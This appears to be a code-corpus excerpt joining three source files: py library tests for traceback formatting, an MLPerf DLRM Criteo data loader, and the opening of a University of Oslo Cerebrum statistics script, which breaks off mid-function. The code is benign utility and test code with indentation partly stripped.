excinfo.traceback = Traceback(tb)
fail = IOError()
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[0].lines[0] == "> ???"
fail = py.error.ENOENT
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[0].lines[0] == "> ???"
def test_repr_local(self):
p = FormattedExcinfo(showlocals=True)
loc = {'y': 5, 'z': 7, 'x': 3, '@x': 2, '__builtins__': {}}
reprlocals = p.repr_locals(loc)
assert reprlocals.lines
assert reprlocals.lines[0] == '__builtins__ = <builtins>'
assert reprlocals.lines[1] == 'x = 3'
assert reprlocals.lines[2] == 'y = 5'
assert reprlocals.lines[3] == 'z = 7'
def test_repr_tracebackentry_lines(self, importasmod):
mod = importasmod("""
def func1():
raise ValueError("hello\\nworld")
""")
excinfo = py.test.raises(ValueError, mod.func1)
excinfo.traceback = excinfo.traceback.filter()
p = FormattedExcinfo()
reprtb = p.repr_traceback_entry(excinfo.traceback[-1])
# test as intermittent entry
lines = reprtb.lines
assert lines[0] == ' def func1():'
assert lines[1] == '> raise ValueError("hello\\nworld")'
# test as last entry
p = FormattedExcinfo(showlocals=True)
repr_entry = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = repr_entry.lines
assert lines[0] == ' def func1():'
assert lines[1] == '> raise ValueError("hello\\nworld")'
assert lines[2] == 'E ValueError: hello'
assert lines[3] == 'E world'
assert not lines[4:]
loc = repr_entry.reprlocals is not None
loc = repr_entry.reprfileloc
assert loc.path == mod.__file__
assert loc.lineno == 3
#assert loc.message == "ValueError: hello"
    def test_repr_tracebackentry_lines2(self, importasmod):
mod = importasmod("""
def func1(m, x, y, z):
raise ValueError("hello\\nworld")
""")
excinfo = py.test.raises(ValueError, mod.func1, "m"*90, 5, 13, "z"*120)
excinfo.traceback = excinfo.traceback.filter()
entry = excinfo.traceback[-1]
p = FormattedExcinfo(funcargs=True)
reprfuncargs = p.repr_args(entry)
assert reprfuncargs.args[0] == ('m', repr("m"*90))
assert reprfuncargs.args[1] == ('x', '5')
assert reprfuncargs.args[2] == ('y', '13')
assert reprfuncargs.args[3] == ('z', repr("z" * 120))
p = FormattedExcinfo(funcargs=True)
repr_entry = p.repr_traceback_entry(entry)
assert repr_entry.reprfuncargs.args == reprfuncargs.args
tw = TWMock()
repr_entry.toterminal(tw)
assert tw.lines[0] == "m = " + repr('m' * 90)
assert tw.lines[1] == "x = 5, y = 13"
assert tw.lines[2] == "z = " + repr('z' * 120)
def test_repr_tracebackentry_lines_var_kw_args(self, importasmod):
mod = importasmod("""
def func1(x, *y, **z):
raise ValueError("hello\\nworld")
""")
excinfo = py.test.raises(ValueError, mod.func1, 'a', 'b', c='d')
excinfo.traceback = excinfo.traceback.filter()
entry = excinfo.traceback[-1]
p = FormattedExcinfo(funcargs=True)
reprfuncargs = p.repr_args(entry)
assert reprfuncargs.args[0] == ('x', repr('a'))
assert reprfuncargs.args[1] == ('y', repr(('b',)))
assert reprfuncargs.args[2] == ('z', repr({'c': 'd'}))
p = FormattedExcinfo(funcargs=True)
repr_entry = p.repr_traceback_entry(entry)
assert repr_entry.reprfuncargs.args == reprfuncargs.args
tw = TWMock()
repr_entry.toterminal(tw)
assert tw.lines[0] == "x = 'a', y = ('b',), z = {'c': 'd'}"
def test_repr_tracebackentry_short(self, importasmod):
mod = importasmod("""
def func1():
raise ValueError("hello")
def entry():
func1()
""")
excinfo = py.test.raises(ValueError, mod.entry)
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback_entry(excinfo.traceback[-2])
lines = reprtb.lines
basename = py.path.local(mod.__file__).basename
assert lines[0] == ' func1()'
assert basename in str(reprtb.reprfileloc.path)
assert reprtb.reprfileloc.lineno == 5
# test last entry
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = reprtb.lines
assert lines[0] == ' raise ValueError("hello")'
assert lines[1] == 'E ValueError: hello'
assert basename in str(reprtb.reprfileloc.path)
assert reprtb.reprfileloc.lineno == 3
def test_repr_tracebackentry_no(self, importasmod):
mod = importasmod("""
def func1():
raise ValueError("hello")
def entry():
func1()
""")
excinfo = py.test.raises(ValueError, mod.entry)
p = FormattedExcinfo(style="no")
p.repr_traceback_entry(excinfo.traceback[-2])
p = FormattedExcinfo(style="no")
reprentry = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = reprentry.lines
assert lines[0] == 'E ValueError: hello'
assert not lines[1:]
def test_repr_traceback_tbfilter(self, importasmod):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = py.test.raises(ValueError, mod.entry)
p = FormattedExcinfo(tbfilter=True)
reprtb = p.repr_traceback(excinfo)
assert len(reprtb.reprentries) == 2
p = FormattedExcinfo(tbfilter=False)
reprtb = p.repr_traceback(excinfo)
assert len(reprtb.reprentries) == 3
def test_traceback_short_no_source(self, importasmod, monkeypatch):
mod = importasmod("""
def func1():
raise ValueError("hello")
def entry():
func1()
""")
excinfo = py.test.raises(ValueError, mod.entry)
from py._code.code import Code
monkeypatch.setattr(Code, 'path', 'bogus')
excinfo.traceback[0].frame.code.path = "bogus"
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback_entry(excinfo.traceback[-2])
lines = reprtb.lines
last_p = FormattedExcinfo(style="short")
last_reprtb = last_p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
last_lines = last_reprtb.lines
monkeypatch.undo()
basename = py.path.local(mod.__file__).basename
assert lines[0] == ' func1()'
assert last_lines[0] == ' raise ValueError("hello")'
assert last_lines[1] == 'E ValueError: hello'
def test_repr_traceback_and_excinfo(self, importasmod):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = py.test.raises(ValueError, mod.entry)
for style in ("long", "short"):
p = FormattedExcinfo(style=style)
reprtb = p.repr_traceback(excinfo)
assert len(reprtb.reprentries) == 2
assert reprtb.style == style
assert not reprtb.extraline
repr = p.repr_excinfo(excinfo)
assert repr.reprtraceback
assert len(repr.reprtraceback.reprentries) == len(reprtb.reprentries)
assert repr.reprcrash.path.endswith("mod.py")
assert repr.reprcrash.message == "ValueError: 0"
def test_repr_traceback_with_invalid_cwd(self, importasmod, monkeypatch):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = py.test.raises(ValueError, mod.entry)
p = FormattedExcinfo()
def raiseos():
raise OSError(2)
monkeypatch.setattr(py.std.os, 'getcwd', raiseos)
assert p._makepath(__file__) == __file__
reprtb = p.repr_traceback(excinfo)
def test_repr_excinfo_addouterr(self, importasmod):
mod = importasmod("""
def entry():
raise ValueError()
""")
excinfo = py.test.raises(ValueError, mod.entry)
repr = excinfo.getrepr()
repr.addsection("title", "content")
twmock = TWMock()
repr.toterminal(twmock)
assert twmock.lines[-1] == "content"
assert twmock.lines[-2] == ("-", "title")
def test_repr_excinfo_reprcrash(self, importasmod):
mod = importasmod("""
def entry():
raise ValueError()
""")
excinfo = py.test.raises(ValueError, mod.entry)
repr = excinfo.getrepr()
assert repr.reprcrash.path.endswith("mod.py")
assert repr.reprcrash.lineno == 3
assert repr.reprcrash.message == "ValueError"
assert str(repr.reprcrash).endswith("mod.py:3: ValueError")
def test_repr_traceback_recursion(self, importasmod):
mod = importasmod("""
def rec2(x):
return rec1(x+1)
def rec1(x):
return rec2(x-1)
def entry():
rec1(42)
""")
excinfo = py.test.raises(RuntimeError, mod.entry)
for style in ("short", "long", "no"):
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback(excinfo)
assert reprtb.extraline == "!!! Recursion detected (same locals & position)"
assert str(reprtb)
def test_tb_entry_AssertionError(self, importasmod):
# probably this test is a bit redundant
# as py/magic/testing/test_assertion.py
# already tests correctness of
# assertion-reinterpretation logic
mod = importasmod("""
def somefunc():
x = 1
assert x == 2
""")
excinfo = py.test.raises(AssertionError, mod.somefunc)
p = FormattedExcinfo()
reprentry = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = reprentry.lines
assert lines[-1] == "E assert 1 == 2"
def test_reprexcinfo_getrepr(self, importasmod):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = py.test.raises(ValueError, mod.entry)
for style in ("short", "long", "no"):
for showlocals in (True, False):
repr = excinfo.getrepr(style=style, showlocals=showlocals)
assert isinstance(repr, ReprExceptionInfo)
assert repr.reprtraceback.style == style
def test_reprexcinfo_unicode(self):
from py._code.code import TerminalRepr
class MyRepr(TerminalRepr):
def toterminal(self, tw):
tw.line(py.builtin._totext("я", "utf-8"))
x = py.builtin._totext(MyRepr())
assert x == py.builtin._totext("я", "utf-8")
def test_toterminal_long(self, importasmod):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = py.test.raises(ValueError, mod.f)
excinfo.traceback = excinfo.traceback.filter()
repr = excinfo.getrepr()
tw = TWMock()
repr.toterminal(tw)
assert tw.lines[0] == ""
tw.lines.pop(0)
assert tw.lines[0] == " def f():"
assert tw.lines[1] == "> g(3)"
assert tw.lines[2] == ""
assert tw.lines[3].endswith("mod.py:5: ")
assert tw.lines[4] == ("_ ", None)
assert tw.lines[5] == ""
assert tw.lines[6] == " def g(x):"
assert tw.lines[7] == "> raise ValueError(x)"
assert tw.lines[8] == "E ValueError: 3"
assert tw.lines[9] == ""
assert tw.lines[10].endswith("mod.py:3: ValueError")
def test_toterminal_long_missing_source(self, importasmod, tmpdir):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = py.test.raises(ValueError, mod.f)
tmpdir.join('mod.py').remove()
excinfo.traceback = excinfo.traceback.filter()
repr = excinfo.getrepr()
tw = TWMock()
repr.toterminal(tw)
assert tw.lines[0] == ""
tw.lines.pop(0)
assert tw.lines[0] == "> ???"
assert tw.lines[1] == ""
assert tw.lines[2].endswith("mod.py:5: ")
assert tw.lines[3] == ("_ ", None)
assert tw.lines[4] == ""
assert tw.lines[5] == "> ???"
assert tw.lines[6] == "E ValueError: 3"
assert tw.lines[7] == ""
assert tw.lines[8].endswith("mod.py:3: ValueError")
def test_toterminal_long_incomplete_source(self, importasmod, tmpdir):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = py.test.raises(ValueError, mod.f)
tmpdir.join('mod.py').write('asdf')
excinfo.traceback = excinfo.traceback.filter()
repr = excinfo.getrepr()
tw = TWMock()
repr.toterminal(tw)
assert tw.lines[0] == ""
tw.lines.pop(0)
assert tw.lines[0] == "> ???"
assert tw.lines[1] == ""
assert tw.lines[2].endswith("mod.py:5: ")
assert tw.lines[3] == ("_ ", None)
assert tw.lines[4] == ""
assert tw.lines[5] == "> ???"
assert tw.lines[6] == "E ValueError: 3"
assert tw.lines[7] == ""
assert tw.lines[8].endswith("mod.py:3: ValueError")
def test_toterminal_long_filenames(self, importasmod):
mod = importasmod("""
def f():
raise ValueError()
""")
excinfo = py.test.raises(ValueError, mod.f)
tw = TWMock()
path = py.path.local(mod.__file__)
old = path.dirpath().chdir()
try:
repr = excinfo.getrepr(abspath=False)
repr.toterminal(tw)
line = tw.lines[-1]
x = py.path.local().bestrelpath(path)
if len(x) < len(str(path)):
assert line == "mod.py:3: ValueError"
repr = excinfo.getrepr(abspath=True)
repr.toterminal(tw)
line = tw.lines[-1]
assert line == "%s:3: ValueError" %(path,)
finally:
old.chdir()
@py.test.mark.multi(reproptions=[
{'style': style, 'showlocals': showlocals,
'funcargs': funcargs, 'tbfilter': tbfilter
} for style in ("long", "short", "no")
for showlocals in (True, False)
for tbfilter in (True, False)
for funcargs in (True, False)])
def test_format_excinfo(self, importasmod, reproptions):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = py.test.raises(ValueError, mod.f)
tw = py.io.TerminalWriter(stringio=True)
repr = excinfo.getrepr(**reproptions)
repr.toterminal(tw)
assert tw.stringio.getvalue()
def test_native_style(self):
excinfo = self.excinfo_from_exec("""
assert 0
""")
repr = excinfo.getrepr(style='native')
assert "assert 0" in str(repr.reprcrash)
s = str(repr)
assert s.startswith('Traceback (most recent call last):\n File')
assert s.endswith('\nAssertionError: assert 0')
assert 'exec (source.compile())' in s
# python 2.4 fails to get the source line for the assert
if py.std.sys.version_info >= (2, 5):
assert s.count('assert 0') == 2
def test_traceback_repr_style(self, importasmod):
mod = importasmod("""
def f():
g()
def g():
h()
def h():
i()
def i():
raise ValueError()
""")
excinfo = py.test.raises(ValueError, mod.f)
excinfo.traceback = excinfo.traceback.filter()
excinfo.traceback[1].set_repr_style("short")
excinfo.traceback[2].set_repr_style("short")
r = excinfo.getrepr(style="long")
tw = TWMock()
r.toterminal(tw)
for line in tw.lines: print (line)
assert tw.lines[0] == ""
assert tw.lines[1] == " def f():"
assert tw.lines[2] == "> g()"
assert tw.lines[3] == ""
assert tw.lines[4].endswith("mod.py:3: ")
assert tw.lines[5] == ("_ ", None)
assert tw.lines[6].endswith("in g")
assert tw.lines[7] == " h()"
assert tw.lines[8].endswith("in h")
assert tw.lines[9] == " i()"
assert tw.lines[10] == ("_ ", None)
assert tw.lines[11] == ""
assert tw.lines[12] == " def i():"
assert tw.lines[13] == "> raise ValueError()"
assert tw.lines[14] == "E ValueError"
assert tw.lines[15] == ""
assert tw.lines[16].endswith("mod.py:9: ValueError")
| mpl-2.0 |
mlperf/inference_results_v0.7 | closed/Atos/code/dlrm/tensorrt/scripts/data_loader_terabyte.py | 18 | 12309 | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import numpy as np
from torch.utils.data import Dataset
import torch
import time
import math
from tqdm import tqdm
import argparse
class DataLoader:
"""
DataLoader dedicated for the Criteo Terabyte Click Logs dataset
"""
def __init__(
self,
data_filename,
data_directory,
days,
batch_size,
max_ind_range=-1,
split="train",
drop_last_batch=False
):
self.data_filename = data_filename
self.data_directory = data_directory
self.days = days
self.batch_size = batch_size
self.max_ind_range = max_ind_range
total_file = os.path.join(
data_directory,
data_filename + "_day_count.npz"
)
with np.load(total_file) as data:
total_per_file = data["total_per_file"][np.array(days)]
self.length = sum(total_per_file)
if split == "test" or split == "val":
self.length = int(np.ceil(self.length / 2.))
self.split = split
self.drop_last_batch = drop_last_batch
def __iter__(self):
return iter(
_batch_generator(
self.data_filename, self.data_directory, self.days,
self.batch_size, self.split, self.drop_last_batch, self.max_ind_range
)
)
def __len__(self):
if self.drop_last_batch:
return self.length // self.batch_size
else:
return math.ceil(self.length / self.batch_size)
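# Note (descriptive comment added to the original): for split='test' or
# split='val' the loader only covers half of the requested samples --
# __init__ halves self.length, and _batch_generator() below slices each day
# file so that 'test' iterates the first half and 'val' the second half.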
def _transform_features(
x_int_batch, x_cat_batch, y_batch, max_ind_range, flag_input_torch_tensor=False
):
if max_ind_range > 0:
x_cat_batch = x_cat_batch % max_ind_range
if flag_input_torch_tensor:
x_int_batch = torch.log(x_int_batch.clone().detach().type(torch.float) + 1)
x_cat_batch = x_cat_batch.clone().detach().type(torch.long)
y_batch = y_batch.clone().detach().type(torch.float32).view(-1, 1)
else:
x_int_batch = torch.log(torch.tensor(x_int_batch, dtype=torch.float) + 1)
x_cat_batch = torch.tensor(x_cat_batch, dtype=torch.long)
y_batch = torch.tensor(y_batch, dtype=torch.float32).view(-1, 1)
batch_size = x_cat_batch.shape[0]
feature_count = x_cat_batch.shape[1]
lS_o = torch.arange(batch_size).reshape(1, -1).repeat(feature_count, 1)
return x_int_batch, lS_o, x_cat_batch.t(), y_batch.view(-1, 1)
def _batch_generator(
data_filename, data_directory, days, batch_size, split, drop_last, max_ind_range
):
previous_file = None
for day in days:
filepath = os.path.join(
data_directory,
data_filename + "_{}_reordered.npz".format(day)
)
# print('Loading file: ', filepath)
with np.load(filepath) as data:
x_int = data["X_int"]
x_cat = data["X_cat"]
y = data["y"]
samples_in_file = y.shape[0]
batch_start_idx = 0
if split == "test" or split == "val":
length = int(np.ceil(samples_in_file / 2.))
if split == "test":
samples_in_file = length
elif split == "val":
batch_start_idx = samples_in_file - length
while batch_start_idx < samples_in_file - batch_size:
missing_samples = batch_size
if previous_file is not None:
missing_samples -= previous_file['y'].shape[0]
current_slice = slice(batch_start_idx, batch_start_idx + missing_samples)
x_int_batch = x_int[current_slice]
x_cat_batch = x_cat[current_slice]
y_batch = y[current_slice]
if previous_file is not None:
x_int_batch = np.concatenate(
[previous_file['x_int'], x_int_batch],
axis=0
)
x_cat_batch = np.concatenate(
[previous_file['x_cat'], x_cat_batch],
axis=0
)
y_batch = np.concatenate([previous_file['y'], y_batch], axis=0)
previous_file = None
if x_int_batch.shape[0] != batch_size:
raise ValueError('should not happen')
yield _transform_features(x_int_batch, x_cat_batch, y_batch, max_ind_range)
batch_start_idx += missing_samples
if batch_start_idx != samples_in_file:
current_slice = slice(batch_start_idx, samples_in_file)
if previous_file is not None:
previous_file = {
'x_int' : np.concatenate(
[previous_file['x_int'], x_int[current_slice]],
axis=0
),
'x_cat' : np.concatenate(
[previous_file['x_cat'], x_cat[current_slice]],
axis=0
),
'y' : np.concatenate([previous_file['y'], y[current_slice]], axis=0)
}
else:
previous_file = {
'x_int' : x_int[current_slice],
'x_cat' : x_cat[current_slice],
'y' : y[current_slice]
}
if not drop_last:
yield _transform_features(
previous_file['x_int'],
previous_file['x_cat'],
previous_file['y'],
max_ind_range
)
def _test():
generator = _batch_generator(
data_filename='day',
data_directory='/input',
days=range(23),
split="train",
batch_size=2048
)
t1 = time.time()
for x_int, lS_o, x_cat, y in generator:
t2 = time.time()
time_diff = t2 - t1
t1 = t2
print(
"time {} x_int.shape: {} lS_o.shape: {} x_cat.shape: {} y.shape: {}".format(
time_diff, x_int.shape, lS_o.shape, x_cat.shape, y.shape
)
)
class CriteoBinDataset(Dataset):
"""Binary version of criteo dataset."""
def __init__(self, data_file, counts_file,
batch_size=1, max_ind_range=-1, bytes_per_feature=4):
# dataset
self.tar_fea = 1 # single target
self.den_fea = 13 # 13 dense features
self.spa_fea = 26 # 26 sparse features
self.tad_fea = self.tar_fea + self.den_fea
self.tot_fea = self.tad_fea + self.spa_fea
self.batch_size = batch_size
self.max_ind_range = max_ind_range
self.bytes_per_entry = (bytes_per_feature * self.tot_fea * batch_size)
self.num_entries = math.ceil(os.path.getsize(data_file) / self.bytes_per_entry)
print('data file:', data_file, 'number of batches:', self.num_entries)
self.file = open(data_file, 'rb')
with np.load(counts_file) as data:
self.counts = data["counts"]
# hardcoded for now
self.m_den = 13
def __len__(self):
return self.num_entries
def __getitem__(self, idx):
self.file.seek(idx * self.bytes_per_entry, 0)
raw_data = self.file.read(self.bytes_per_entry)
array = np.frombuffer(raw_data, dtype=np.int32)
tensor = torch.from_numpy(array).view((-1, self.tot_fea))
return _transform_features(x_int_batch=tensor[:, 1:14],
x_cat_batch=tensor[:, 14:],
y_batch=tensor[:, 0],
max_ind_range=self.max_ind_range,
flag_input_torch_tensor=True)
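# Minimal usage sketch (added; assumes the binary file and counts file produced
# by numpy_to_binary()/_preprocess() below already exist at these paths):
#
#   ds = CriteoBinDataset(data_file='train_data.bin',
#                         counts_file='day_fea_count.npz', batch_size=2048)
#   x_int, lS_o, x_cat, y = ds[0]
#   # x_int: (2048, 13) log(1+x) dense features, lS_o and x_cat: (26, 2048),
#   # y: (2048, 1) click labels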
def numpy_to_binary(input_files, output_file_path, split='train'):
"""Convert the data to a binary format to be read with CriteoBinDataset."""
# WARNING - both categorical and numerical data must fit into int32 for
# the following code to work correctly
with open(output_file_path, 'wb') as output_file:
if split == 'train':
for input_file in input_files:
print('Processing file: ', input_file)
np_data = np.load(input_file)
np_data = np.concatenate([np_data['y'].reshape(-1, 1),
np_data['X_int'],
np_data['X_cat']], axis=1)
np_data = np_data.astype(np.int32)
output_file.write(np_data.tobytes())
else:
assert len(input_files) == 1
np_data = np.load(input_files[0])
np_data = np.concatenate([np_data['y'].reshape(-1, 1),
np_data['X_int'],
np_data['X_cat']], axis=1)
np_data = np_data.astype(np.int32)
samples_in_file = np_data.shape[0]
midpoint = int(np.ceil(samples_in_file / 2.))
if split == "test":
begin = 0
end = midpoint
elif split == "val":
begin = midpoint
end = samples_in_file
else:
raise ValueError('Unknown split value: ', split)
output_file.write(np_data[begin:end].tobytes())
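# Layout note (illustrative): each sample is written as 40 int32 values --
# [label, 13 dense features, 26 categorical indices] -- i.e. 160 bytes per
# sample, which is what CriteoBinDataset above assumes via bytes_per_feature=4
# and tot_fea = 1 + 13 + 26.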
def _preprocess(args):
train_files = ['{}_{}_reordered.npz'.format(args.input_data_prefix, day) for
day in range(0, 23)]
test_valid_file = args.input_data_prefix + '_23_reordered.npz'
os.makedirs(args.output_directory, exist_ok=True)
for split in ['train', 'val', 'test']:
print('Running preprocessing for split =', split)
output_file = os.path.join(args.output_directory,
'{}_data.bin'.format(split))
input_files = train_files if split == 'train' else [test_valid_file]
numpy_to_binary(input_files=input_files,
output_file_path=output_file,
split=split)
def _test_bin():
parser = argparse.ArgumentParser()
parser.add_argument('--output_directory', required=True)
parser.add_argument('--input_data_prefix', required=True)
parser.add_argument('--split', choices=['train', 'test', 'val'],
required=True)
args = parser.parse_args()
# _preprocess(args)
binary_data_file = os.path.join(args.output_directory,
'{}_data.bin'.format(args.split))
counts_file = os.path.join(args.output_directory, 'day_fea_count.npz')
dataset_binary = CriteoBinDataset(data_file=binary_data_file,
counts_file=counts_file,
batch_size=2048,)
from dlrm_data_pytorch import CriteoDataset, collate_wrapper_criteo
binary_loader = torch.utils.data.DataLoader(
dataset_binary,
batch_size=None,
shuffle=False,
num_workers=0,
collate_fn=None,
pin_memory=False,
drop_last=False,
)
original_dataset = CriteoDataset(
dataset='terabyte',
max_ind_range=10 * 1000 * 1000,
sub_sample_rate=1,
randomize=True,
split=args.split,
raw_path=args.input_data_prefix,
pro_data='dummy_string',
memory_map=True
)
original_loader = torch.utils.data.DataLoader(
original_dataset,
batch_size=2048,
shuffle=False,
num_workers=0,
collate_fn=collate_wrapper_criteo,
pin_memory=False,
drop_last=False,
)
assert len(dataset_binary) == len(original_loader)
for i, (old_batch, new_batch) in tqdm(enumerate(zip(original_loader,
binary_loader)),
total=len(dataset_binary)):
for j in range(len(new_batch)):
if not np.array_equal(old_batch[j], new_batch[j]):
raise ValueError('FAILED: Datasets not equal')
if i > len(dataset_binary):
break
print('PASSED')
if __name__ == '__main__':
_test()
    _test_bin()
| apache-2.0 |
unioslo/cerebrum | contrib/no/uio/user_per_sko.py | 1 | 20843 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2004 University of Oslo, Norway
#
# This file is part of Cerebrum.
#
# Cerebrum is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cerebrum is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cerebrum; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from __future__ import unicode_literals
"""
This file is a UiO-specific extension of Cerebrum.
It provides user/person statistics about various organizational units (OUs)
at the UiO. The script provides statistics at various granularity levels
(--level option).
--level fakultet produces statistics grouped by faculty (fakultet). A
faculty of a given OU is the first OU in the OU hierarchy that has
(institutt, avdeling) == (0, 0). For all OUs that do not have such
parents, the stats are grouped together under the same tag.
--level institutt produces statistics grouped by department (institutt). A
department of a given OU is the first OU in the OU hierarchy that has
avdeling = 0. For all OUs that do not have such parents, the stats are
grouped together under the same tag.
--level gruppe produces statistics with each OU taken as is, without any
parent lookup.
"""
import argparse
import copy
import types
import locale
from six import text_type
from Cerebrum.Utils import Factory
logger = None
def make_ou_to_stedkode_map(db):
"""
Returns a dictionary mapping ou_ids to (fak,inst,avd) triplets
(stedkoder).
"""
ou = Factory.get("OU")(db)
result = dict()
for row in ou.get_stedkoder():
result[int(row["ou_id"])] = (int(row["fakultet"]),
int(row["institutt"]),
int(row["avdeling"]))
logger.debug("%d ou -> stedkode mappings", len(result))
return result
def make_ou_to_parent_map(perspective, db):
"""
Returns a dictionary mapping ou_ids to their parent ids (or None, if no
parent exists) in a given PERSPECTIVE (FS, LT, etc.)
"""
ou = Factory.get("OU")(db)
result = dict()
for item in ou.get_structure_mappings(perspective):
if item["parent_id"] is not None:
parent_id = int(item["parent_id"])
else:
parent_id = None
result[int(item["ou_id"])] = parent_id
logger.debug("%d ou -> parent mappings", len(result))
return result
#
# sko for all OUs that we cannot classify.
__undef_ou = "andre"
def locate_ou(ou_id, ou2parent, ou2stedkode, level):
"""
Return a suitable parent of OU_ID.
LEVEL determines how far up the hierarchy we are walking.
0 means the entity itself
1 means the closest parent with avdeling part of the sko == 0
2 means the closest parent with avdeling and institutt part of
the sko == 0.
Should we reach the top of the hierarchy without finding a suitable
(parent) OU, a special value is returned. The statistics for that group
will be cumulative for _all_ OU_ID that have no suitable (parent) OU.
"""
ou_id = int(ou_id)
# If level == oneself, just return the ou_id
if level == 0:
return ou2stedkode[ou_id]
tmp = ou_id
while 1:
if tmp is None:
# We reached the top of the hierarchy without seeing anything
# suitable
logger.debug("ou_id %d has no proper parent", ou_id)
return __undef_ou
if tmp not in ou2stedkode:
logger.warn("Cannot locate sko for ou_id %s. Assuming undef", tmp)
return __undef_ou
tmp_sko = ou2stedkode[tmp]
# extract the right part of the sko
if tmp_sko[3-level:] == (0,)*level:
return tmp_sko
# ... or continue with parent
tmp = ou2parent.get(tmp)
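# Illustrative example (made-up sko values, not from the database): how
# locate_ou() collapses an OU to its parent at a given level.
#
#   ou2stedkode = {1: (14, 5, 20), 2: (14, 5, 0), 3: (14, 0, 0)}
#   ou2parent = {1: 2, 2: 3, 3: None}
#   locate_ou(1, ou2parent, ou2stedkode, 0)  -> (14, 5, 20)  # the OU itself
#   locate_ou(1, ou2parent, ou2stedkode, 1)  -> (14, 5, 0)   # institutt level
#   locate_ou(1, ou2parent, ou2stedkode, 2)  -> (14, 0, 0)   # fakultet level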
def display_statistics(statistics):
"""
STATISTICS is a dictionary indexed by faculty numbers (K) and with
values (V) being dictionaries with statistics information.
This function assumes that _all_ Vs have the exactly same set of keys.
"""
logger.debug("Statistics:")
# The keys we are interested in
keys = ('ansatt', 'student', 'a&s', 'tilknyttet', 'manuell', 'alle manuell')
    # Keys that are reported but kept out of the summed total (must be a tuple,
    # not a bare string, so that the membership test below works per key).
    nosum = ('alle manuell',)
# Dictionary for totalling up numbers per affiliation
total = dict([(key, 0) for key in keys])
faculty_keys = statistics.keys()
# Order the faculty output by sko
faculty_keys.sort()
# Yes, the code is ugly, but people do not like
# pprint.print(dictionary)
fak_width = 14
field_width = 10
fak_underline = u"-" * fak_width + u"+"
field_underline = u"-" * field_width + u"+"
fak_format = u"%%%ds" % fak_width
field_format = u"%%%ds" % field_width
values = (u"navn",) + tuple([x[0:field_width] for x in keys])
enc = locale.getpreferredencoding()
print (((fak_format + u"|") % u"fak") +
((field_format + u"|") * len(values)) % values).encode(enc)
print (u"%s%s" % (fak_underline, field_underline * len(values))).encode(enc)
def output_fak(faculty, value):
if isinstance(faculty, types.TupleType):
faculty_text = u"%02d%02d%02d" % faculty
else:
faculty_text = faculty
message = ((fak_format % faculty_text) +
(u"|" + field_format) % value["name"][0:field_width])
for key in keys:
message += "|" + field_format % value[key]
print message.encode(enc)
for faculty in faculty_keys:
value = statistics[faculty]
if 'cum' in value:
value['cum']['name'] = u'totalsum'
if isinstance(faculty, types.TupleType):
text = u'%02d****' % faculty[0]
else:
text = faculty + u' *'
# print (u"%s%s" % (fak_underline,
# field_underline * len(values))).encode(enc)
output_fak(text, value['cum'])
output_fak(faculty, value)
for key in keys:
total[key] += value[key]
print ("%s%s" % (fak_underline, field_underline * len(values))).encode(enc)
message = (fak_format + u"|") % u"Total" + (field_format + u"|") % u"--"
summa = 0
nosumma = 0
for key in keys:
message += (field_format + u"|") % total[key]
if key not in nosum:
summa += total[key]
else:
nosumma += total[key]
print message.encode(enc), (field_format % '{} (+{})'.format(summa, nosumma)
.encode(enc))
def purge_0rows(statistics):
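    """
    Remove rows where every counter is zero.

    If an otherwise empty faculty row carries a non-empty 'cum' entry, the
    cumulative entry is kept under a separate 'NN****'-style key before the
    empty row is dropped.
    """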
for key in statistics.keys():
val = statistics[key]
cum = val.get('cum')
empty = not any((val[k] for k in val.keys() if k not in ('cum',
'name')))
if cum and empty and any((cum[k] for k in cum.keys() if k != 'name')):
cum['name'] = u'totalsum'
if isinstance(key, types.TupleType):
name = u'%02d****' % key[0]
else:
name = u'%s *' % key
statistics[name] = cum
if empty:
del statistics[key]
return statistics
def make_empty_statistics(level, db, extra_fak_sum=False):
"""
Return an empty dictionary suitable for statistics collection.
Depending on the LEVEL, we'll have a different number of keys in
STATISTICS.
"""
fakultet, institutt, avdeling = None, None, None
if level > 0:
avdeling = 0
if level > 1:
institutt = 0
ou = Factory.get("OU")(db)
sko = ou.get_stedkoder(fakultet=fakultet, institutt=institutt,
avdeling=avdeling)
const = Factory.get("Constants")()
statistics = dict()
# "Unspecified" stats.
statistics[__undef_ou] = {"name": u"undef", 'cum': dict()}
for row in sko:
ou_sko = (int(row["fakultet"]),
int(row["institutt"]),
int(row["avdeling"]))
ou.clear()
ou.find(row["ou_id"])
acronyms = ou.search_name_with_language(
entity_id=ou.entity_id, name_variant=const.ou_name_acronym)
if acronyms:
ou_name = acronyms[0]["name"]
else:
names = ou.search_name_with_language(entity_id=ou.entity_id,
name_variant=const.ou_name)
if names:
